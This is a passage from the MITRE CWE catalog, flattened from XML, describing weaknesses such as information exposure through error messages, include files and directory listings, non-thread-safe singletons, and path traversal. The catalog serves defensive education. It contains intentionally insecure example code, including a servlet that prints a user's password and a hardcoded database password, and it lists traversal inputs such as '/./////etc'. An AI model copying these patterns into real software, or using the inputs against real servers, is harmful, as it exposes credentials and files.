Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Information Leak Through Debug Log Files - Information Exposure Through Debug Log Files - - - - A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system. - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak Through Shell Error Message - Information Exposure Through Shell Error Message - - - - A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker. - - - - - - Implementation - - - - - Confidentiality - Read Application Data - The error message may contain the location of the file in which the offending function is located. This may disclose the web root's absolute path as well as give the attacker the location of application files or configuration information. It may even disclose the portion of code that failed. In many cases, an attacker can use the data to launch further attacks against the system. - - - - - The following servlet code does not catch runtime exceptions, meaning that if such an exception were to occur, the container may display potentially dangerous information (such as a full stack trace). - - public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - String username = request.getParameter("username"); - - // May cause unchecked NullPointerException. - if (username.length() < 10) {...} - } - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak Through Servlet Runtime Error Message - Information Exposure Through Servlet Runtime Error Message - - - - In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system. - - - - - - - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Implementation - Do not expose sensitive error information to the user. - - - - - In the following Java example the class InputFileRead enables an input file to be read using a FileReader object. In the constructor of this class a default input file path is set to some directory on the local file system and the method setInputFile must be called to set the name of the input file to be read in the default directory. The method readInputFile will create the FileReader object and will read the contents of the file. If the method setInputFile is not called prior to calling the method readInputFile then the File object will remain null when initializing the FileReader object. A Java RuntimeException will be raised, and an error message will be output to the user. - - public class InputFileRead { - - private File readFile = null;private FileReader reader = null;private String inputFilePath = null;private final String DEFAULT_FILE_PATH = "c:\\somedirectory\\"; - public InputFileRead() {inputFilePath = DEFAULT_FILE_PATH;} - public void setInputFile(String inputFile) { - - - /* Assume appropriate validation / encoding is used and privileges / permissions are preserved */ - - - } - public void readInputFile() { - try {reader = new FileReader(readFile);...} catch (RuntimeException rex) {System.err.println("Error: Cannot open input file in the directory " + inputFilePath);System.err.println("Input file has not been set, call setInputFile method before calling readInputFile"); - - } catch (FileNotFoundException ex) {...} - - } - } - - However, the error message output to the user contains information regarding the default directory on the local file system. This information can be exploited and may lead to unauthorized access or use of the system. Any Java RuntimeExceptions that are handled should not expose sensitive information to the user. - - - In the example below, the BankManagerLoginServlet servlet class will process a login request to determine if a user is authorized to use the BankManager Web service. The doPost method will retrieve the username and password from the servlet request and will determine if the user is authorized. If the user is authorized the servlet will go to the successful login page. Otherwise, the servlet will raise a FailedLoginException and output the failed login message to the error page of the service. - - public class BankManagerLoginServlet extends HttpServlet { - protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - try { - - - // Get username and password from login page request - String username = request.getParameter("username");String password = request.getParameter("password"); - // Authenticate user - BankManager bankMgr = new BankManager();boolean isAuthentic = bankMgr.authenticateUser(username, password); - // If user is authenticated then go to successful login page - if (isAuthentic) {request.setAttribute("login", new String("Login Successful."));getServletContext().getRequestDispatcher("/BankManagerServiceLoggedIn.jsp"). forward(request, response);}else { - - - // Otherwise, raise failed login exception and output unsuccessful login message to error page - throw new FailedLoginException("Failed Login for user " + username + " with password " + password); - } - } catch (FailedLoginException ex) { - - - // output failed login message to error page - request.setAttribute("error", new String("Login Error"));request.setAttribute("message", ex.getMessage());getServletContext().getRequestDispatcher("/ErrorPage.jsp").forward(request, response); - } - } - - - - However, the output message generated by the FailedLoginException includes the user-supplied password. Even if the password is erroneous, it is probably close to the correct password. Since it is printed to the user's page, anybody who can see the screen display will be able to see the password. Also, if the page is cached, the password might be written to disk. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak Through Java Runtime Error Message - Information Exposure Through Java Runtime Error Message - - - - The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information. - - - - - - - - - Implementation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Operation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Read Files or Directories - - - - - Architecture and Design - Operation - System Configuration - Do not expose file and directory information to the user. - - - - - - - - - - Depending on usage, this could be a weakness or a category. Further study of all its children is needed, and the entire sub-tree may need to be clarified. The current organization is based primarily on the exposure of sensitive information as a consequence, instead of as a primary weakness. - There is a close relationship with CWE-552, which is more focused on weaknesses. As a result, it may be more appropriate to convert CWE-538 to a category. - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Type - - - CWE Content Team - MITRE - 2009-12-28 - updated Description, Maintenance_Notes, Name - - - Veracode - 2010-09-09 - Suggested OWASP Top Ten mapping - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - File and Directory Information Leaks - File and Directory Information Exposure - - - - The web application uses persistent cookies, but the cookies contain sensitive information. - Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information. The web application controls what information is stored in a cookie and how it is used. Typical types of information stored in cookies are session identifiers, personalization and customization information, and in rare cases even usernames to enable automated logins. There are two different types of cookies: session cookies and persistent cookies. Session cookies just live in the browser's memory and are not stored anywhere, but persistent cookies are stored on the browser's hard drive. This can cause security and privacy issues depending on the information stored in the cookie and how it is accessed. - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - Do not store sensitive information in persistent cookies. - - - - - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships - - Information Leak Through Persistent Cookies - Information Exposure Through Persistent Cookies - - - - A software system that accepts path input in the form of trailing backslash ('filedir\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2004-0847 - ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847 - - - - - filedir\ (trailing backslash) - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Trailing Backslash - (filedir\) - - - - Source code on a web server or repository often contains sensitive information and should generally not be accessible to users. - There are situations where it is critical to remove source code from an area or server. For example, obtaining Perl source code on a system allows an attacker to understand the logic of the script and extract extremely useful information such as code bugs or logins and passwords. - - - - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - System Configuration - Recommendations include removing this script from the web server and moving it to a location not accessible from the Internet. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type - - Information Leak Through Source Code - Information Exposure Through Source Code - - - - If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system. - - - - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - Do not store sensitive information in include files. - - - Architecture and Design - System Configuration - Protect include files from being exposed. - - - - - The following code uses an include file to store database credentials: - database.inc - - <?php$dbName = 'usersDB';$dbPassword = 'skjdh#67nkjd3$3$';?> - - login.php - - <?phpinclude('database.inc');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?> - - If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Information Leak Through Include Source Code - Information Exposure Through Include Source Code - - - - This entry has been deprecated because its abstraction was too low-level. See CWE-532. - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Common_Consequences, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Information Leak Through Cleanup Log Files - Information Exposure Through Cleanup Log Files - - - - The software uses the singleton pattern when creating a resource within a multithreaded environment. - The use of a singleton pattern may not be thread-safe. - - - - - - - - - - - - Implementation - - - - - Other - Integrity - Other - Modify Application Data - - - - - Architecture and Design - Use the Thread-Specific Storage Pattern. See References. - - - Implementation - Do not use member fields to store information in the Servlet. In multithreading environments, storing user data in Servlet member fields introduces a data access race condition. - - - Implementation - Avoid using the double-checked locking pattern in language versions that cannot guarantee thread safety. This pattern may be used to avoid the overhead of a synchronized call, but in certain versions of Java (for example), this has been shown to be unsafe because it still introduces a race condition (CWE-209). - Limited - - - - - This method is part of a singleton pattern, yet the following singleton() pattern is not thread-safe. It is possible that the method will create two objects instead of only one. - - private static NumberConverter singleton;public static NumberConverter get_singleton() {if (singleton == null) {singleton = new NumberConverter();}return singleton;} - - Consider the following course of events: - - - - Thread A enters the method, finds singleton to be null, begins the NumberConverter constructor, and then is swapped out of execution. - - - Thread B enters the method and finds that singleton remains null. This will happen if A was swapped out during the middle of the constructor, because the object reference is not set to point at the new object on the heap until the object is fully initialized. - - - Thread B continues and constructs another NumberConverter object and returns it while exiting the method. - - - Thread A continues, finishes constructing its NumberConverter object, and returns its version. - - - - At this point, the threads have created and returned two different objects. - - - - - MSC07-J - Prevent multiple instantiations of singleton objects - - - SFP19 - Missing Lock - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Use of Singleton Pattern in a Non-thread-safe Manner - - - - The software does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses. - If the application handles error messages individually, on a one-by-one basis, this is likely to result in inconsistent error handling. The causes of errors may be lost. Also, detailed information about the causes of an error may be unintentionally returned to the user. - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Integrity - Other - Quality Degradation - Unexpected State - Varies by Context - - - - - Architecture and Design - define a strategy for handling errors of different severities, such as fatal errors versus basic log events. Use or create built-in language features, or an external package, that provides an easy-to-use API and define coding standards for the detection and handling of errors. - - - - - ERR00-C - Adopt and implement a consistent and comprehensive error-handling policy - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - Missing Error Handling Mechanism - Failure to Use a Standardized Error Handling Mechanism - - - - This weakness has been deprecated because it partially overlaps CWE-470, it describes legitimate programmer behavior, and other portions will need to be integrated into other entries. - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - Dynamic Class Loading - Use of Dynamic Class Loading - - - - The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses. - Many suspicious comments, such as BUG, HACK, FIXME, LATER, LATER2, TODO, in the code indicate missing security functionality and checking. Others indicate code problems that programmers should fix, such as hard-coded variables, error handling, not using stored procedures, and performance issues. - - - - - - Indirect - - - - - - - - Implementation - - - - - Other - Quality Degradation - Suspicious comments could be an indication that there are problems in the source code that may need to be fixed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses. - - - - - Documentation - Remove comments that suggest the presence of bugs, incomplete functionality, or weaknesses, before deploying the application. - - - - - The following excerpt demonstrates the use of a suspicious comment in an incomplete code block that may have security repercussions. - - if (user == null) { - - - // TODO: Handle null user condition. - - - } - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The program uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change. - If the developer does not find all occurrences of the hard-coded constants, an incorrect policy decision may be made if one of the constants is not changed. Making changes to these values will require code changes that may be difficult or impossible once the system is released to the field. In addition, these hard-coded values may become available to attackers if the code is ever disclosed. - - - - - - Indirect - - - - - Implementation - - - - - Other - Varies by Context - Quality Degradation - The existence of hardcoded constants could cause unexpected behavior and the introduction of weaknesses during code maintenance or when making changes to the code if all occurrences are not modified. The use of hardcoded constants is an indication of poor quality. - - - - - Implementation - Avoid using hard-coded constants. Configuration files offer a more flexible solution. - - - - - The usage of symbolic names instead of hard-coded constants is preferred. - The following is an example of using a hard-coded constant instead of a symbolic name. - - char buffer[1024];...fgets(buffer, 1024, stdin); - - If the buffer value needs to be changed, then it has to be altered in more than one place. If the developer forgets or does not find all occurences, in this example it could lead to a buffer overflow. - - enum { MAX_BUFFER_SIZE = 1024 };...char buffer[MAX_BUFFER_SIZE];...fgets(buffer, MAX_BUFFER_SIZE, stdin); - - In this example the developer will only need to change one value and all references to the buffer size are updated, as a symbolic name is used instead of a hard-coded constant. - - - - - DCL06-C - Use meaningful symbolic constants to represent literal values in program logic - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Security-relevant Constants - - - - A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers. - A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible. - - - - - - Implementation - - - Operation - - - - - Confidentiality - Read Files or Directories - Exposing the contents of a directory can lead to an attacker gaining access to source code or providing useful information for the attacker to devise exploits, such as creation times of files or any information that may be encoded in file names. The directory listing may also compromise private or confidential data. - - - - - Architecture and Design - System Configuration - Recommendations include restricting access to important directories or files by adopting a need to know requirement for both the document and server root, and turning off features such as Automatic Directory Listings that could expose private files and provide information that could be utilized by an attacker when formulating or conducting an attack. - - - - - A10 - Insecure Configuration Management - CWE More Specific - - - 16 - Directory Indexing - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak Through Directory Listing - Information Exposure Through Directory Listing - - - - The software does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords. - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - Requirements - Recommendations include requiring all password fields in your web application be masked to prevent other users from seeing this information. - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Type - - - - - A software system that accepts path input in the form of single dot directory exploit ('/./') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2000-0004 - Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004 - - - CVE-2002-0304 - Server allows remote attackers to read password-protected files via a /./ in the HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304 - - - BID:6042 - Input Validation error - http://www.securityfocus.com/bid/6042 - - - CVE-1999-1083 - Possibly (could be a cleansing error) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083 - - - CVE-2004-0815 - "/./////etc" cleansed to ".///etc" then "/etc" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815 - - - CVE-2002-0112 - Server allows remote attackers to view password protected files via /./ in the URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112 - - - - - /./ (single dot directory) - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 